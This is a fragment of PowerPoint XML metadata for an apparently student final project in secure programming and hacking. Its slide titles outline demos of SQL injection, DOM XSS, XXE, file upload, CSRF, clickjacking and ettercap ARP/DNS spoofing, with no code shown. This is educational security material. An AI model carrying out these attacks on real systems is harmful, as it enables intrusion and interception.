              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5100687" y="612834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/>
              <a:t>整體關聯圖</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="833593057"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="股利">
  <a:themeElements>
    <a:clrScheme name="股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股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股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{1039EF49-D927-014D-B878-8F3DED75F5B8}tf10001123</Template>
  <TotalTime>442</TotalTime>
  <Words>3064</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>416</Paragraphs>
  <Slides>81</Slides>
  <Notes>2</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>7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96" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>BiauKai</vt:lpstr>
      <vt:lpstr>Microsoft JhengHei UI</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>股利</vt:lpstr>
      <vt:lpstr>安全程式設計 與駭客攻防技術 期末專案</vt:lpstr>
      <vt:lpstr>組員分工</vt:lpstr>
      <vt:lpstr>目錄</vt:lpstr>
      <vt:lpstr>系統架構與資料庫設計</vt:lpstr>
      <vt:lpstr>系統架構</vt:lpstr>
      <vt:lpstr>系統架構</vt:lpstr>
      <vt:lpstr>網頁介紹影片</vt:lpstr>
      <vt:lpstr>GIthub</vt:lpstr>
      <vt:lpstr>資料庫設計</vt:lpstr>
      <vt:lpstr>Users</vt:lpstr>
      <vt:lpstr>product</vt:lpstr>
      <vt:lpstr>User_profile_photo</vt:lpstr>
      <vt:lpstr>stock</vt:lpstr>
      <vt:lpstr>Page_visits</vt:lpstr>
      <vt:lpstr>SQL injection UNION attack</vt:lpstr>
      <vt:lpstr>UNION??</vt:lpstr>
      <vt:lpstr>UNION??</vt:lpstr>
      <vt:lpstr>如何攻擊？</vt:lpstr>
      <vt:lpstr>攻擊流程</vt:lpstr>
      <vt:lpstr>攻擊流程</vt:lpstr>
      <vt:lpstr>攻擊流程</vt:lpstr>
      <vt:lpstr>DEMO影片</vt:lpstr>
      <vt:lpstr>blind SQL injection</vt:lpstr>
      <vt:lpstr>什麼是BLIND SQL INJECTION?</vt:lpstr>
      <vt:lpstr>DEMO 影片</vt:lpstr>
      <vt:lpstr>DOM XSS</vt:lpstr>
      <vt:lpstr>什麼是DOM?</vt:lpstr>
      <vt:lpstr>DOM的弱點</vt:lpstr>
      <vt:lpstr>DOM的弱點</vt:lpstr>
      <vt:lpstr>DEMO中的攻擊點</vt:lpstr>
      <vt:lpstr>DEMO中的攻擊點</vt:lpstr>
      <vt:lpstr>DEMO準備(攻擊者開啟SERVER)</vt:lpstr>
      <vt:lpstr>DEMO準備(攻擊者開啟SERVER)</vt:lpstr>
      <vt:lpstr>DEMO準備(將函攻擊的URL縮成短網址)</vt:lpstr>
      <vt:lpstr>DEMO影片</vt:lpstr>
      <vt:lpstr>XXE Injection</vt:lpstr>
      <vt:lpstr>XML是什麼？</vt:lpstr>
      <vt:lpstr>XML 預先定義好的 Entity</vt:lpstr>
      <vt:lpstr>DTD(Document Type Definition)</vt:lpstr>
      <vt:lpstr>DTD 也可以用來定義Entity</vt:lpstr>
      <vt:lpstr>XML external entities</vt:lpstr>
      <vt:lpstr>DEMO影片</vt:lpstr>
      <vt:lpstr>任意檔案上傳</vt:lpstr>
      <vt:lpstr>成因</vt:lpstr>
      <vt:lpstr>攻擊的方式</vt:lpstr>
      <vt:lpstr>攻擊的方式</vt:lpstr>
      <vt:lpstr>攻擊的方式</vt:lpstr>
      <vt:lpstr>攻擊的方式</vt:lpstr>
      <vt:lpstr>MIME ?</vt:lpstr>
      <vt:lpstr>我們網站漏洞</vt:lpstr>
      <vt:lpstr>Demo影片</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>原理</vt:lpstr>
      <vt:lpstr>我們網站的CSRF漏洞</vt:lpstr>
      <vt:lpstr>我們網站的CSRF漏洞</vt:lpstr>
      <vt:lpstr>clickjacking</vt:lpstr>
      <vt:lpstr>甚麼是ClickJACKING?</vt:lpstr>
      <vt:lpstr>刪除帳號的頁面</vt:lpstr>
      <vt:lpstr>刪除帳號網頁的request</vt:lpstr>
      <vt:lpstr>攻擊者的網頁畫面(將透明度調為50%)</vt:lpstr>
      <vt:lpstr>攻擊者的網頁畫面(將透明度調為0%)</vt:lpstr>
      <vt:lpstr>DEMO前置作業</vt:lpstr>
      <vt:lpstr>DEMO前置作業</vt:lpstr>
      <vt:lpstr>DEMO前置作業</vt:lpstr>
      <vt:lpstr>Demo影片(實際可能不存在)</vt:lpstr>
      <vt:lpstr>遇到的問題</vt:lpstr>
      <vt:lpstr>無法取得原網站的COOKIE</vt:lpstr>
      <vt:lpstr>DNS spoofing</vt:lpstr>
      <vt:lpstr>甚麼是APR Spoofing?</vt:lpstr>
      <vt:lpstr>1.查看主機(victim)和kali虛擬機(attacker)的IP與getway</vt:lpstr>
      <vt:lpstr>2.在/etc/ettercap/etter.dns加入所要欺騙的網址</vt:lpstr>
      <vt:lpstr>3.查看原先facebook所相連的ip位址</vt:lpstr>
      <vt:lpstr>4.打開ettercap，scan hosts並將getway與victim的IP作為欺騙對象</vt:lpstr>
      <vt:lpstr>5.打開插件中的DNS_spoof，並開啟ARP poisoning</vt:lpstr>
      <vt:lpstr>6.驗證結果</vt:lpstr>
      <vt:lpstr>7.檢查此時getway(router)的MAC位址</vt:lpstr>
      <vt:lpstr>8.實際上kali(attacker)上的網頁(192.168.0.102)</vt:lpstr>
      <vt:lpstr>參考文獻</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>系統製作參考與引用資源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安全程式設計 與駭客攻防技術 期末專案</dc:title>
  <dc:creator>昱佑 李</dc:creator>
  <cp:lastModifiedBy>昱佑 李</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-05T04:26:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-16T11:31:13Z</dcterms:modified>
</cp:coreProperties>
</file>